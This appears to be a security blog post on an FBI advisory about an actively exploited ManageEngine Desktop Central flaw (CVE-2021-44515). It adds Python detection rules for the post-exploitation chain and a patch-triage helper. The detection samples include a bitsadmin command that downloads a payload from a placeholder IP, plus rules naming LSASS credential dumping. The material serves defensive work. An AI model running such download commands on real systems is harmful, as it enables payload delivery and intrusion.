A vulnerability in Zoho's ManageEngine Desktop Central software is being actively exploited by APT threat actors, according to a new advisory from the FBI. The vulnerability, tracked as CVE-2021-44515, allows a remote attacker to bypass authentication in ManageEngine Desktop Central and execute arbitrary code on the server.
The FBI and security researchers have observed threat actors exploiting this vulnerability to establish a foothold in a network or to escalate privileges. After gaining that foothold, the actors have been seen downloading post-exploitation tools, enumerating domain users and groups, conducting network reconnaissance, attempting lateral movement, and dumping credentials. Initial reconnaissance is performed through a webshell that the threat actors inject into the Desktop Central software, overriding the legitimate Desktop Central API servlet endpoint. Once reconnaissance is complete, the actors drop malware with remote access trojan (RAT) functionality that establishes persistence as a Windows service and injects itself into an svchost process for execution and defense evasion. Further activity is then carried out through the RAT.
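The chain above maps onto a handful of host-level detections. As an added example, not code from the FBI advisory or from Binary Defense, the following Python sketches one rule per stage (a shell spawned by the Desktop Central Java process, the BITSAdmin download and LSASS memory access mentioned in the recommendations further down, service persistence from a user-writable path, and a remote thread injected into svchost) and runs them over constructed Sysmon-style events. The Desktop Central install path, the TEST-NET IP address, file names and the allow-lists are assumptions for illustration and should be tuned to the environment.

```python
"""Detection sketch for the Desktop Central post-exploitation chain.
Added example; the events below are constructed, not real telemetry."""
from dataclasses import dataclass


@dataclass
class Event:
    """Normalised Windows event. event_id follows Sysmon (1 = process create,
    8 = CreateRemoteThread, 10 = ProcessAccess) plus System log 7045 (service
    installed)."""
    host: str
    event_id: int
    image: str = ""           # acting process
    parent_image: str = ""
    command_line: str = ""
    target_image: str = ""    # target process of Sysmon 8/10
    granted_access: int = 0   # Sysmon 10 access mask
    service_path: str = ""    # ImagePath from event 7045


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Images allowed to read lsass memory (assumed allow-list; tune per environment).
# svchost.exe is deliberately absent: the RAT runs inside it after injection.
LSASS_ALLOWED = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe"}
PROCESS_VM_READ = 0x0010
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\", "\\windows\\tasks\\")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_webshell_child(e: Event) -> bool:
    # Desktop Central's server runs under Java; a shell spawned by that Java
    # process is webshell-like. Matching "DesktopCentral" in the parent path
    # assumes the default install directory name.
    return (e.event_id == 1
            and basename(e.parent_image) in ("java.exe", "javaw.exe")
            and "desktopcentral" in e.parent_image.lower()
            and basename(e.image) in SHELLS)


def rule_bitsadmin_download(e: Event) -> bool:
    # BITSAdmin used as a downloader (T1197): transfer job with a URL source.
    cl = e.command_line.lower()
    return (e.event_id == 1 and basename(e.image) == "bitsadmin.exe"
            and ("/transfer" in cl or "/addfile" in cl) and "http" in cl)


def rule_service_install(e: Event) -> bool:
    # Persistence via a new service whose binary lives in a user-writable path.
    return e.event_id == 7045 and any(d in e.service_path.lower() for d in USER_WRITABLE)


def rule_svchost_injection(e: Event) -> bool:
    # Remote thread created in svchost by something other than the service host itself.
    return (e.event_id == 8 and basename(e.target_image) == "svchost.exe"
            and basename(e.image) not in ("services.exe", "svchost.exe"))


def rule_lsass_read(e: Event) -> bool:
    # Credential dumping: lsass opened with PROCESS_VM_READ by a non-allow-listed image.
    return (e.event_id == 10 and basename(e.target_image) == "lsass.exe"
            and (e.granted_access & PROCESS_VM_READ) != 0
            and basename(e.image) not in LSASS_ALLOWED)


RULES = {
    "webshell_child": rule_webshell_child,
    "bitsadmin_download": rule_bitsadmin_download,
    "service_install": rule_service_install,
    "svchost_injection": rule_svchost_injection,
    "lsass_read": rule_lsass_read,
}


def detect(events):
    """Return (host, rule_name) for every event that trips a rule."""
    return [(e.host, name) for e in events for name, rule in RULES.items() if rule(e)]


def hosts_with_chain(findings, min_stages=2):
    """Group findings per host. Any single rule can fire on admin activity, so
    hosts tripping several distinct stages are the ones to escalate."""
    by_host = {}
    for host, name in findings:
        by_host.setdefault(host, set()).add(name)
    return {h: sorted(s) for h, s in by_host.items() if len(s) >= min_stages}


# Constructed sample: one compromised server plus benign noise on a workstation.
DC_JAVA = r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe"
SAMPLE_EVENTS = [
    Event("dc-srv01", 1, image=r"C:\Windows\System32\cmd.exe", parent_image=DC_JAVA,
          command_line="cmd.exe /c whoami"),
    Event("dc-srv01", 1, image=r"C:\Windows\System32\bitsadmin.exe",
          command_line=r"bitsadmin /transfer job /download /priority high "
                       r"http://203.0.113.10/update.exe C:\Users\Public\update.exe"),
    Event("dc-srv01", 7045, service_path=r"C:\Users\Public\update.exe"),
    Event("dc-srv01", 8, image=r"C:\Users\Public\update.exe",
          target_image=r"C:\Windows\System32\svchost.exe"),
    Event("dc-srv01", 10, image=r"C:\Windows\System32\svchost.exe",
          target_image=r"C:\Windows\System32\lsass.exe", granted_access=0x1010),
    Event("ws-042", 1, image=r"C:\Windows\System32\cmd.exe",
          parent_image=r"C:\Windows\explorer.exe", command_line="cmd.exe"),
    Event("ws-042", 10, image=r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
          target_image=r"C:\Windows\System32\lsass.exe", granted_access=0x1010),
    Event("ws-042", 8, image=r"C:\Windows\System32\services.exe",
          target_image=r"C:\Windows\System32\svchost.exe"),
]

if __name__ == "__main__":
    for host, stages in hosts_with_chain(detect(SAMPLE_EVENTS)).items():
        print(host, "->", ", ".join(stages))
```

Run stand-alone it reports only dc-srv01, with all five stages; the workstation's Defender engine reading lsass and services.exe starting svchost are filtered out by the allow-lists. In production the per-host grouping would be a time-bounded correlation rather than a flat set, but the rule shapes are the ones an EDR or SIEM would carry.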
Earlier this month, Zoho released patches for its Desktop Central platform that remediate this vulnerability.
The first recommendation for any organization running vulnerable software is to patch immediately: installations on build 10.1.2127.17 and below should upgrade to 10.1.2127.18, and installations on builds 10.1.2128.0 through 10.1.2137.2 should upgrade to 10.1.2137.3. Beyond patching, the techniques and tools used by the actors exploiting this vulnerability can be prevented, or at a minimum detected, by common endpoint detection and response (EDR) tools. For example, the threat actors have been seen using BITSAdmin to download the malware payload and Mimikatz or LSASS memory dumping to harvest credentials; both are well-known techniques with mature prevention and detection coverage. Binary Defense’s Managed Detection and Response service is an excellent asset to help with detecting this sort of activity.
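To turn those build ranges into a triage check across an inventory, here is a small Python helper, added here rather than taken from Zoho or the FBI advisory. It compares the four-part Desktop Central build number against the two affected ranges above and reports which build each host must move to; the inventory at the bottom is constructed, and host names are placeholders.

```python
"""Build-number triage for CVE-2021-44515 using the affected and fixed builds
stated in the text. Added example; the inventory is constructed."""

# (highest affected build, lowest affected build or None, build to upgrade to)
FIX_FOR = [
    ((10, 1, 2127, 17), None, "10.1.2127.18"),
    ((10, 1, 2137, 2), (10, 1, 2128, 0), "10.1.2137.3"),
]


def parse_build(build: str):
    """'10.1.2127.17' -> (10, 1, 2127, 17); tuples compare component-wise,
    so 10.1.2130.5 < 10.1.2137.2 even though '2130.5' > '2137.2' as text."""
    parts = build.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised build string: {build!r}")
    return tuple(int(p) for p in parts)


def required_upgrade(build: str):
    """Return the build to upgrade to, or None if this build is not in an
    affected range (the fixed builds themselves fall outside both ranges)."""
    b = parse_build(build)
    for high, low, fixed in FIX_FOR:
        if b <= high and (low is None or b >= low):
            return fixed
    return None


def triage(inventory):
    """Split a {host: build} inventory into hosts needing a patch (with the
    target build) and hosts whose build string could not be read."""
    needs_patch, unreadable = {}, []
    for host, build in inventory.items():
        try:
            fixed = required_upgrade(build)
        except ValueError:
            unreadable.append(host)
            continue
        if fixed is not None:
            needs_patch[host] = fixed
    return needs_patch, unreadable


# Constructed inventory covering both ranges, both fixed builds and a bad entry.
INVENTORY = {
    "dc-prod": "10.1.2127.17",
    "dc-lab": "10.1.2130.5",
    "dc-new": "10.1.2137.3",
    "dc-old": "10.0.512.0",
    "dc-dr": "10.1.2127.18",
    "dc-bad": "unknown",
}

if __name__ == "__main__":
    patch, bad = triage(INVENTORY)
    for host, fixed in sorted(patch.items()):
        print(f"{host}: upgrade to {fixed}")
    for host in bad:
        print(f"{host}: build string unreadable, check manually")
```

Hosts whose build cannot be read are listed rather than silently skipped, since an inventory gap on an internet-facing management server is itself a finding.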